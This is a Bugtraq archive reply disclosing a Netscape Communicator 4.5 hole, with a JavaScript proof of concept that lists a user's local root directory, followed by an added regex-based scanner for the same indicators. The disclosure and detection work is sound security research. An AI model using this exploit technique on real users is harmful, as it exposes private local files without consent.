Bugtraq mailing list archives

Re: Netscape Communicator 4.5 can read local files


From: haddock () UDEL EDU (Terence Christopher Haddock)
Date: Wed, 25 Nov 1998 15:28:45 -0500


        This security hole is not limited to knowing a specific file name;
it can be used to list the contents of a directory, which I believe is
much more insidious. This script can send a list of the files in the
user's root directory under Windows:

sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";

        (Simple to modify it for UNIX)
        Using a search algorithm the script could search for specific
files by running this recursively. The only problem (from a hacker's
perspective, a good thing from our perspective) is all of the windows it
would open. If a way could be worked around this (which I think it can),
this script could run without a user even knowing it, searching the user's
directories and reporting them to a server.

Sincerely,
Terence C. Haddock

On Wed, 25 Nov 1998, Ben Collins wrote:

Seems I was proven seriously wrong, *swallows pride*. Only limitation I
see is that you do have to know the file name and path contrary to the
original post, and as stated by the person who conducted the test, it is
platform specific (he had to change it to work on this unix system). Not
trying to dilute the problem, just noting some things.

Apologies for the error in my statements, but isn't it much nicer to see
it _really_ work?

--
-----    -- - -------- --------- ----  -------  -----  - - ---   --------
Ben Collins <b.m.collins () larc nasa gov>                  Debian GNU/Linux
UnixGroup Admin - Jordan Systems Inc.                 bcollins () debian org
------ -- ----- - - -------   ------- -- The Choice of the GNU Generation
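
For filtering or reviewing page source, the indicators in the script above (a wysiwyg:// URL wrapping file://, a javascript: URL assigned to a window location, and LiveConnect access to java.io.File) can be matched statically. The following is an added example, not part of the original thread; the rule names, function names and sample inputs are constructed for illustration.

```javascript
// Added example: static indicator scan for the pattern discussed in this thread.
// Rule ids and both samples below are constructed, not taken from a real page.
const RULES = [
  { id: "wysiwyg-wraps-file", re: /wysiwyg:\/\/\d+\/file:/i },
  { id: "javascript-url-to-location", re: /\.location\s*=\s*["']?javascript:/i },
  // Case-insensitive: the class may be written in any capitalisation.
  { id: "liveconnect-java-io-file", re: /\bjava\.io\.file\b/i },
];

// The script body is built piecewise inside a javascript: URL, so collapse
// "a" + "b" concatenations and drop backslash escapes before matching.
function normalize(src) {
  return src
    .replace(/["']\s*\+\s*["']/g, "") // "abc" +\n "def" -> "abcdef"
    .replace(/\\(["'\\])/g, "$1");    // \" -> "   and   \\ -> \
}

// Returns the ids of every rule that matches the normalized source.
function scanScript(src) {
  const text = normalize(src);
  return RULES.filter((r) => r.re.test(text)).map((r) => r.id);
}

// Constructed sample with the same structure as the posted script; the class
// name is split across a concatenation to show why normalize() is needed.
const SAMPLE_FLAGGED = [
  'w = window.open("wysiwyg://1/file://C|/");',
  'w2 = w.window.open();',
  'w2.location = "javascript:" +',
  '  "var f = new java.io." + "File(\\"C:/\\");" +',
  '  "alert(f.list());";',
].join("\n");

// Constructed benign sample: ordinary navigation and form access.
const SAMPLE_BENIGN = [
  'window.location = "index.html";',
  'var f = document.forms[0];',
].join("\n");

console.log(scanScript(SAMPLE_FLAGGED));
console.log(scanScript(SAMPLE_BENIGN));
```

This is a source-text heuristic only; it does not evaluate script, so strings assembled at run time by other means are not seen.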
